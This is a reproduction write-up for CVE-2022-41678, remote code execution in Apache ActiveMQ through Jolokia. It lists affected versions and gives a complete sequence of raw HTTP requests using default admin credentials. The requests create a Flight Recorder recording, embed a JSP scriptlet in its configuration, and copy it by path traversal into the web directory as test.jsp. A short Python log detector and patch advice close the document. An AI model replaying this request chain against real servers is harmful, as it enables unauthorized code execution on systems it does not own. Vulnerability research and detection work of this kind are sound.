## Apache ActiveMQ Jolokia Remote Code Execution (CVE-2022-41678)

## Affected versions

```
Apache ActiveMQ before 5.16.6
Apache ActiveMQ 5.17.0 before 5.17.4
Apache ActiveMQ 5.18.0 unaffected
Apache ActiveMQ 6.0.0 unaffected
```

## Download of the version used for reproduction

```
https://activemq.apache.org/activemq-5017000-release
```

## Reproduction

#### Create a recording

```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
  "type": "EXEC",
  "mbean": "jdk.management.jfr:type=FlightRecorder",
  "operation": "newRecording",
  "arguments": []
}
```

Note the number returned in the `value` field of the response; the later PoC steps use it as the recording id (here it is 4).

![](./assets/20231130233131.png)

#### Write the payload

```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
  "type": "EXEC",
  "mbean": "jdk.management.jfr:type=FlightRecorder",
  "operation": "setConfiguration",
  "arguments": [4," true everyChunk <%out.printIn("success");%> true 1000 ms true everyChunk true 1000 ms true true true true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 0 ms true true 0 ms true true 0 ms true true false true 0 ms false true false true beginChunk true beginChunk true 10 ms true 20 ms true 0 ms false 0 ms false 0 ms false 0 ms false 0 ms false 0 ms true 0 ms true true true 60 s true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true true true true true true true false everyChunk true everyChunk true beginChunk true beginChunk true beginChunk true beginChunk false true true true true true true true true true true true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms false 0 ms false 0 ms true 0 ms true true true true true true true true true true true true false true true false everyChunk false true true 0 ns true beginChunk true 1000 ms true 100 ms true 10 s true false true 
beginChunk true everyChunk true 100 ms true beginChunk true everyChunk true true beginChunk true beginChunk true 10 s true 1000 ms true 10 s true beginChunk true endChunk true 5 s true beginChunk true everyChunk true true true true true everyChunk true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 10 ms false true true true true 1000 ms true true true true true 10 ms true 0 ms 10 ms true true 10 ms false true 0 ms false true 0 ms false true 0 ms 10 ms 10 ms 10 ms false "]
}
```

![](./assets/20231130233450.png)

### Exporting the recording to the web directory

```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 141

{
  "type": "EXEC",
  "mbean": "jdk.management.jfr:type=FlightRecorder",
  "operation": "startRecording",
  "arguments": [4]
}
```

![](./assets/20231130233542.png)

```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "type": "EXEC",
  "mbean": "jdk.management.jfr:type=FlightRecorder",
  "operation": "stopRecording",
  "arguments": [4]
}
```

![](./assets/20231130233602.png)

#### Export to the web directory

```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 159

{
  "type": "EXEC",
  "mbean": "jdk.management.jfr:type=FlightRecorder",
  "operation": "copyTo",
  "arguments": [4,"../../webapps/test.jsp"]
}
```

![](./assets/20231130233747.png)

#### test.jsp written successfully

![](./assets/20231130233759.png)

![](./assets/20231130233835.png)

## Source of the vulnerability

- https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/

## payload

I set up the source locally, but the environment was not configured correctly and I could not debug the code; the payload was found by searching GitHub for keywords.

- https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4
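## Detection

As an added example (not part of the original writeup or of ActiveMQ), the Python below classifies Jolokia request bodies the way a defender might when reviewing proxy or access logs for the FlightRecorder chain shown above: any EXEC against `jdk.management.jfr:type=FlightRecorder` is flagged, and `setConfiguration` carrying a JSP scriptlet or `copyTo` writing outside the recording directory is escalated. The sample request bodies are constructed, and the assumption is that full POST bodies are available in the logs.

```python
import json
from typing import Dict, List, Optional

FLIGHT_RECORDER = "jdk.management.jfr:type=FlightRecorder"

# Constructed sample Jolokia request bodies (not captured traffic).
SAMPLE_REQUESTS = [
    '{"type":"read","mbean":"java.lang:type=Memory","attribute":"HeapMemoryUsage"}',
    '{"type":"EXEC","mbean":"jdk.management.jfr:type=FlightRecorder",'
    '"operation":"newRecording","arguments":[]}',
    '{"type":"EXEC","mbean":"jdk.management.jfr:type=FlightRecorder",'
    '"operation":"setConfiguration","arguments":[4,"<configuration><%...%></configuration>"]}',
    '{"type":"EXEC","mbean":"jdk.management.jfr:type=FlightRecorder",'
    '"operation":"copyTo","arguments":[4,"../../webapps/test.jsp"]}',
    "not json at all",
]


def classify(body: str) -> Optional[Dict]:
    """Return a finding for one Jolokia body, or None if it is benign or unparseable."""
    try:
        req = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return None
    if not isinstance(req, dict) or str(req.get("type", "")).lower() != "exec":
        return None
    if req.get("mbean") != FLIGHT_RECORDER:
        return None
    op = req.get("operation", "")
    args = req.get("arguments") or []
    finding = {"operation": op, "severity": "medium",
               "reason": "FlightRecorder MBean invoked via Jolokia"}
    # copyTo with traversal or a JSP destination is the step that drops a file into webapps.
    if op == "copyTo" and len(args) >= 2 and isinstance(args[1], str):
        dest = args[1]
        if ".." in dest or dest.lower().endswith(".jsp"):
            finding["severity"] = "high"
            finding["reason"] = f"recording copied to suspicious path {dest!r}"
    # A JFR configuration should be plain XML; a scriptlet marker means it is carrying code.
    elif op == "setConfiguration" and len(args) >= 2 and "<%" in str(args[1]):
        finding["severity"] = "high"
        finding["reason"] = "JSP scriptlet embedded in JFR configuration"
    return finding


def scan(bodies: List[str]) -> List[Dict]:
    """Classify every body and keep only the findings."""
    return [f for f in (classify(b) for b in bodies) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Patching to 5.16.6 or 5.17.4 (see the affected-versions list above) removes the exposure; the check is only a way to spot the chain in historical logs.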